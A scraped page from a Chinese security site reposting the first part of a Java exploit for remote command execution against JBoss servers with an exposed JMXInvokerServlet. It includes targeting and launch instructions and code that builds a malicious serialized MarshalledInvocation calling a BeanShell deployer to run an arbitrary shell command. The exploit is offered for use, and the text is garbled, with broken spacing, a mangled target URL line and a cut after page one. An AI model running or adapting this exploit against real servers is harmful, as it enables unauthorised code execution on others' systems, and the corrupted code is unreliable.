JBoss JMXInvokerServlet JMXInvoker 0.3 remote command execution vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201560632
Type myhack58
Reporter 佚名
Modified 2015-04-01T00:00:00


/ * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0. 3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in the JBoss Application Server (4. x, 5. x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" * and the "JMX Console" are protected or disabled. * * [FAQ] * * Q: Is my target vulnerable? * A: If :8 0 8 0/invoker/JMXInvokerServlet">http://:8080/invoker/JMXInvokerServlet exists, it's likely exploitable * * Q: How to fix it? * A: Enable authentication in "jmx-invoker-service.xml" * * Q: Is this virus version-dependent? * A: Unfortunately, yes. An hash value is used to properly invoke a method. * At least comparing version 4. x and 5. x, these hashes are different. * * Q: How to compile and launch it? * A: javac-cp ./ libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java-cp .:./ libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Yes, it's a Java exploit. I can already see some of you complaining.... /

import java. io. BufferedReader; import java. io. IOException; import java. io. InputStream; import java. io. InputStreamReader; import java. io. ObjectOutputStream; import java. lang. reflect. Array; import java. lang. reflect. Field; import java. lang. reflect. Method; import java. net. ConnectException; import java. net. HttpURLConnection; import java. net. URL; import javax. management. MalformedObjectNameException; import javax. management. ObjectName; import org. jboss. invocation. MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

public class JMXInvokerServlet {

//---------> CHANGE ME http://www.myhack58.com/invoker/JMXInvokerServlet"; static final String cmd = "touch /tmp/exectest"; //-------------------------------

public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

System. out. println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

//Create a malicious Java serialized object MarshalledInvocation payload = new MarshalledInvocation(); payload. setObjectName(new Integer(hash));

//Executes the MBean invoke operation Class c = Class. forName("javax. management. MBeanServerConnection"); Method method = c. getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java. lang. Object[]. class, java. lang. String[]. class); payload. setMethod(method);

//Define the MBean's name, operation and pars Object myObj[] = new Object[4]; //MBean object name myObj[0] = new ObjectName("jboss. deployer:service=BSHDeployer"); //Operation name myObj[1] = new String("createScriptDeployment"); //Actual parameters myObj[2] = new String[]{"Runtime. getRuntime(). exec(\"" + cmd + "\");", "Script Name"}; //Operation signature myObj[3] = new String[]{"java. lang. String", "java. lang. String"};

payload. setArguments(myObj); System. out. println("\n--[*] MarshalledInvocation object created"); //For debugging - visualize the raw object //The System. out. println(dump(payload));

//Serialize the object

[1] [2] [3] next